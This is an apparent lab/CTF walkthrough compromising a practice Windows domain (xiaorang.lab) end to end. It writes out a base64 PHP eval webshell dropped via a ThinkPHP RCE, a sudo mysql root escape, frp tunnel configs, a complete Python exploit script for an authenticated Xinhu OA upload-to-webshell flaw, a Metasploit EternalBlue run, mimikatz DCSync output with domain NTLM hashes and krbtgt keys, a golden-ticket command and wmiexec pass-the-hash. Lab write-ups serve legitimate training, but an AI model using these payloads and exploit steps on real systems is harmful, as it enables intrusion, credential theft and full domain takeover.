An entry-level range, a quick speedrun.

fscan scan of the external target

```
D:\shentou\fscan>fscan.exe -h 39.99.243.114 -p 1-65535

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.99.243.114:22 open
39.99.243.114:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.243.114 code:200 len:5578 title:Bootstrap Material Admin
[+] PocScan http://39.99.243.114 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 5m11.4893336s
```

flag1

An old ThinkPHP hole (the 5.0.23 method RCE that fscan flagged above). Drop a webshell through it in one shot, then connect with AntSword.

Tip: when writing a shell through an RCE, base64 keeps the quotes and angle brackets of the PHP from being mangled on the way through the injected command. The string below decodes to `<?php eval($_POST["1"]); ?>`:

```
echo 'PD9waHAgZXZhbCgkX1BPU1RbIjEiXSk7ID8+'|base64 -d>shell.php
```

The AntSword terminal shows we are a low-privilege user (www-data), so check sudo -l first:

```
Matching Defaults entries for www-data on ubuntu-web01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
(root) NOPASSWD: /usr/bin/mysql
```

mysql can be run as root via sudo without a password. The mysql client's `\!` escapes to a shell, so every `\!` command below runs as root (and `sudo mysql -e '\! /bin/sh'` would give a full root shell if you need one).

Find and read the flag:

```
sudo mysql -e '\! find / -name flag*'
sudo mysql -e '\! cat /root/flag/flag01.txt'
```


Upload fscan and frp to the web host.

ifconfig shows the internal IP is 172.22.1.15, so scan that subnet with fscan from the web host:

```
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:139 open
172.22.1.2:88 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:3306 open
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetInfo
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetInfo
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
```

Summarizing what we know:
External entry point 39.99.243.114, internal IP 172.22.1.15, already compromised
Internal host 172.22.1.2 is the domain controller DC:DC01.xiaorang.lab
Internal host 172.22.1.18 is the domain member XIAORANG-OA01.xiaorang.lab, running Xinhu OA (信呼协同办公系统) on port 80
Internal host 172.22.1.21 is the domain member XIAORANG-WIN7.xiaorang.lab, vulnerable to MS17-010
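The summary above is the useful product of a noisy fscan run. As an added example (not part of the original writeup and not fscan's own code), the Python below turns fscan's output lines into a per-host inventory: open ports, NetBIOS name and OS, whether the host is a DC, web titles, and the findings (PocScan hits and MS17-010). The sample input is constructed from the lines printed above; the multi-line `[*] NetInfo` blocks are deliberately included and ignored.

```python
import re
from collections import defaultdict

# Constructed sample input: the fscan lines from the internal scan above.
FSCAN_OUTPUT = """\
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.15:22 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.2:139 open
172.22.1.18:139 open
172.22.1.2:88 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:3306 open
[*] WebTitle http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] NetInfo
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[*] NetBios 172.22.1.2 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] OsInfo 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[+] MS17-010 172.22.1.21 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios 172.22.1.21 XIAORANG-WIN7.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetBios 172.22.1.18 XIAORANG-OA01.xiaorang.lab Windows Server 2012 R2 Datacenter 9600
[*] WebTitle http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
[+] PocScan http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1
"""

PORT_RE = re.compile(r"^(\d+(?:\.\d+){3}):(\d+) open$")
# "[+] DC:" is printed in front of the name when the host is a domain controller
NETBIOS_RE = re.compile(r"^\[\*\] NetBios (\S+) (\[\+\] DC:)?(\S+) (.+)$")
OSINFO_RE = re.compile(r"^\[\*\] OsInfo (\S+) \((.+)\)$")
MS17_RE = re.compile(r"^\[\+\] MS17-010 (\S+) \((.+)\)$")
# title runs to end of line unless fscan appends a redirect target (跳转url)
WEBTITLE_RE = re.compile(
    r"^\[\*\] WebTitle (https?://([^\s/?:]+)\S*) code:(\d+) len:\d+ title:(.*?)(?: 跳转url: .*)?$")
POC_RE = re.compile(r"^\[\+\] PocScan (https?://([^\s/?:]+)\S*) (\S+)")


def new_host():
    return {"hostname": None, "os": None, "dc": False, "ports": [], "web": {}, "vulns": []}


def parse_fscan(text):
    """Group fscan's line-oriented output into one record per IP."""
    hosts = defaultdict(new_host)
    for raw in text.splitlines():
        line = raw.strip()
        if m := PORT_RE.match(line):
            hosts[m[1]]["ports"].append(int(m[2]))
        elif m := NETBIOS_RE.match(line):
            h = hosts[m[1]]
            h["hostname"], h["os"] = m[3], m[4]
            h["dc"] = h["dc"] or m[2] is not None
        elif m := OSINFO_RE.match(line):
            hosts[m[1]]["os"] = hosts[m[1]]["os"] or m[2]
        elif m := MS17_RE.match(line):
            h = hosts[m[1]]
            h["vulns"].append("MS17-010")
            h["os"] = h["os"] or m[2]
        elif m := WEBTITLE_RE.match(line):
            hosts[m[2]]["web"][m[1]] = {"code": int(m[3]), "title": m[4]}
        elif m := POC_RE.match(line):
            hosts[m[2]]["vulns"].append(m[3])
        # anything else (banners, NetInfo blocks) carries nothing we key on
    for h in hosts.values():
        h["ports"] = sorted(set(h["ports"]))
    return dict(hosts)


def exploitable(hosts):
    """IPs with at least one fscan finding, mapped to the finding names."""
    return {ip: h["vulns"] for ip, h in hosts.items() if h["vulns"]}


def summarize(hosts):
    """One line per host, DC first by IP order, in the shape of the summary above."""
    def ip_key(ip):
        return tuple(int(x) for x in ip.split("."))
    lines = []
    for ip in sorted(hosts, key=ip_key):
        h = hosts[ip]
        name = (h["hostname"] or "?") + (" [DC]" if h["dc"] else "")
        ports = ",".join(map(str, h["ports"])) or "-"
        web = "; ".join(f"{u} -> {w['title']}" for u, w in h["web"].items()) or "-"
        vulns = ",".join(h["vulns"]) or "-"
        lines.append(f"{ip} {name} os={h['os'] or '?'} ports={ports} web={web} vulns={vulns}")
    return lines


if __name__ == "__main__":
    for line in summarize(parse_fscan(FSCAN_OUTPUT)):
        print(line)
```

Feed it a saved fscan log (`fscan -o result.txt`) instead of the embedded sample to get the same per-host view on a real engagement; `exploitable()` is the list of where to go next.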

The final step is presumably going through 172.22.1.21 to the DC, so first take 172.22.1.18. Set up an frp tunnel for that: frpc runs on the compromised web host and forwards the OA's port 80 to port 20022 on our VPS (frps on the VPS listens on 7000).

frpc.toml

```toml
serverAddr = "xxx.xxx.xxx.xxx"
serverPort = 7000

[[proxies]]
name = "oa"
type = "tcp"
localIP = "172.22.1.18"
localPort = 80
remotePort = 20022
```

flag2

The front page identifies Xinhu OA (信呼协同办公系统) v2.2.8.

Log in straight away with the weak password admin/admin123, then replay the known nday: an authenticated upload stores an arbitrary file with a .uptemp suffix, and the qcloudCos "runt" task renames it back to its real name, leaving a .php on disk.

First put a 1.php next to exp.py with this content:

```php
<?php eval($_POST[1]);?>
```

Then run the exploit:

exp.py

```python
import requests

session = requests.session()
# the OA host, reached through the frp port forward set up above
url_pre = 'http://vps:20022'
url_login = url_pre + '/?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url_upload = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'

# adminuser / adminpass are base64("admin") / base64("admin123")
data1 = {'rempass': '0', 'jmpass': 'false', 'device': '1625884034525', 'ltype': '0',
         'adminuser': 'YWRtaW4=', 'adminpass': 'YWRtaW4xMjM=', 'yanzm': ''}
r = session.post(url_login, data=data1)

# the upload is accepted but stored as <name>.php.uptemp, which is not executable yet
with open('1.php', 'rb') as f:
    r = session.post(url_upload, files={'file': f})
filepath = str(r.json()['filepath'])
filepath = '/' + filepath.split('.uptemp')[0] + '.php'
file_id = r.json()['id']

# the qcloudCos "runt" task renames the .uptemp file back to its .php name
url_rename = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={file_id}'
r = session.get(url_rename)

# run a command through the freshly activated webshell
data2 = {'1': "system('dir');"}
r = session.post(url_pre + filepath, data=data2)
print(r.text)
```

The directory listing shows the file name the shell ended up with; connect to it with AntSword.

flag3

Next is 172.22.1.21. First set up a SOCKS proxy. The config originally used for this was written in frp's legacy INI syntax ([common] / [socks5] with plugin = socks5), which a current frpc will not accept as frpc.toml; below is the same proxy in the TOML syntax already used above. Since the socks5 port on the VPS is reachable from the whole internet, give the plugin a username and password rather than leaving an open proxy into the target network, and put the same credentials in proxychains.conf (`socks5 xxx.xxx.xxx.xxx 5000 user pass`).

frpc.toml

```toml
serverAddr = "xxx.xxx.xxx.xxx"
serverPort = 7000

[[proxies]]
name = "socks5"
type = "tcp"
remotePort = 5000
[proxies.plugin]
type = "socks5"
username = "user"
password = "change-me"
```

Then hit it with msf through the proxy. A bind payload is used on purpose: the target has no route back to our attacker box through the SOCKS tunnel, so a reverse payload would need a listener reachable from inside 172.22.1.0/24, whereas a bind port is reached the same way as port 445 was.

```
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit
```

Next is lateral movement to the domain controller.

To perform a DCSync attack you need the credentials of one of the following:

a member of the domain's Administrators group
a member of Domain Admins
a member of Enterprise Admins
a domain controller's computer account

i.e. by default only the domain admin groups (and DCs themselves) hold the two replication rights this needs, DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object.

EternalBlue left us as SYSTEM on XIAORANG-WIN7, but local SYSTEM by itself is not in any of those groups. What matters is that on the network SYSTEM authenticates as the computer account XIAORANG-WIN7$, so the dump below can only succeed because that account holds the replication rights on the domain object. If you are not sure whether a machine account has them, read the ACL of the domain object (BloodHound or a direct LDAP query) before trying; a failed DCSync from a workstation account is a loud event on the DC.

Running DCSync

```
load kiwi
```

Dump the hashes of every account in the domain (the columns are RID, name, NTLM hash, userAccountControl):

```
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
```

```
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
1000 DC01$ e42fafd0e2581f9949964505dfee032b 532480
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1104 XIAORANG-OA01$ 57db46b9d3f9df2dec50c8deb355e844 4096
1108 XIAORANG-WIN7$ 082b914dd550e3f17e88cd82d34f8b34 4096
```

Generating a golden ticket

Pull the full krbtgt entry; the golden ticket needs its NTLM hash (or, for a less conspicuous RC4-free ticket, the aes256 key) and its objectSid, from which the domain SID is read off:

```
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /user:krbtgt
```

```
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC01.xiaorang.lab' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 2022/6/5 20:40:39
Object Security ID : S-1-5-21-314492864-3856862959-4045974917-502
Object Relative ID : 502

Credentials:
Hash NTLM: fb812eea13a18b7fcdb8e6d67ddc205b
ntlm- 0: fb812eea13a18b7fcdb8e6d67ddc205b
lm - 0: c4f45322c850c77aecb3aa71c2e44c1e

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 849f7f8ab6eb3b3a1c7c926de5ee5574

* Primary:Kerberos-Newer-Keys *
Default Salt : XIAORANG.LABkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : acbbedcabc9ad1d8638cda298e15761626e1bce7ce80eae90d95252f8162bba8
aes128_hmac (4096) : 207ea00513bdf19042937aa38c9ad2dd
des_cbc_md5 (4096) : c70ee386138c7016

* Primary:Kerberos *
Default Salt : XIAORANG.LABkrbtgt
Credentials
des_cbc_md5 : c70ee386138c7016

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 e1108dfe63de9eeca1eefb995e0929bf
02 20b58dbb0fc4e2b4e2cb7ab85f3e711f
03 8a758e996035e1bc42ff1632cf94d2f4
04 e1108dfe63de9eeca1eefb995e0929bf
05 20b58dbb0fc4e2b4e2cb7ab85f3e711f
06 17b26c73d1998bf5e4389b6c946375b9
07 e1108dfe63de9eeca1eefb995e0929bf
08 44fae0b038a11e0aa22bf9c0bb56fde3
09 44fae0b038a11e0aa22bf9c0bb56fde3
10 72d34f6f745066292fc20c2bb9afe9aa
11 64bb1fe398f58cb09752c6cf99ba38d7
12 44fae0b038a11e0aa22bf9c0bb56fde3
13 3a6c03097d06f3d661fab05dd266b8db
14 64bb1fe398f58cb09752c6cf99ba38d7
15 066092366aa2d4cac0c40b732c663580
16 066092366aa2d4cac0c40b732c663580
17 109ffa596356b70d245729765d970b84
18 b38c61423c6240cc51e237825b24011f
19 659c24dbf455331d171d56dee8ce401f
20 70ac8d2c7e5d33c8b05d05bf48dfc66d
21 04a52bb90362eb38a60a2a7879232aac
22 04a52bb90362eb38a60a2a7879232aac
23 0de96f588c278f0520ce23606f88894b
24 b3785273258b55001fec33d8adb718d8
25 b3785273258b55001fec33d8adb718d8
26 65dcf594b8a0be48f803aba2c8c02fd1
27 803052ac4fb8934f4aba581e8533fdb5
28 32b62b5536e1ca61eb0ae7e1fb69f0c9
29 01cb2d0d07700cbf85f27dcf2d15eee0
```

Injecting the golden ticket

/sid takes the domain SID, which is krbtgt's Object Security ID above with its trailing RID (-502) removed; mimikatz appends the RID of /user itself. The original run passed the full -502 SID, and mimikatz still reported success (you can spot the mistake in the output below: the SID line ends in -502 while User Id is 500), but the resulting PAC carries a SID the DC will not recognise, so that ticket is useless. The corrected command is:

```
kiwi_cmd kerberos::golden /user:administrator /domain:xiaorang.lab /sid:S-1-5-21-314492864-3856862959-4045974917 /krbtgt:fb812eea13a18b7fcdb8e6d67ddc205b /ptt
```

Output of the original run (note the 10-year lifetime; mimikatz's defaults, override them with /endin and /renewmax on a real engagement, since a ticket that outlives the domain's 10-hour maximum is an easy detection):

```
User      : administrator
Domain : xiaorang.lab (XIAORANG)
SID : S-1-5-21-314492864-3856862959-4045974917-502
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: fb812eea13a18b7fcdb8e6d67ddc205b - rc4_hmac_nt
Lifetime : 2025/7/10 21:21:04 ; 2035/7/8 21:21:04 ; 2035/7/8 21:21:04
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ xiaorang.lab' successfully submitted for current session
```

The ticket is only injected into the meterpreter session on WIN7 and is not used afterwards; the flag is read with pass-the-hash instead.

We already have Administrator's NTLM hash from the DCSync above, so pass-the-hash with wmiexec or crackmapexec through the SOCKS proxy finishes it.

wmiexec pass-the-hash (the path is relative to C:\, wmiexec's working directory):

```
proxychains python3 wmiexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang/administrator@172.22.1.2 "type Users\Administrator\flag\flag03.txt"
```

Done. Total time: 1 hour 22 minutes 8 seconds.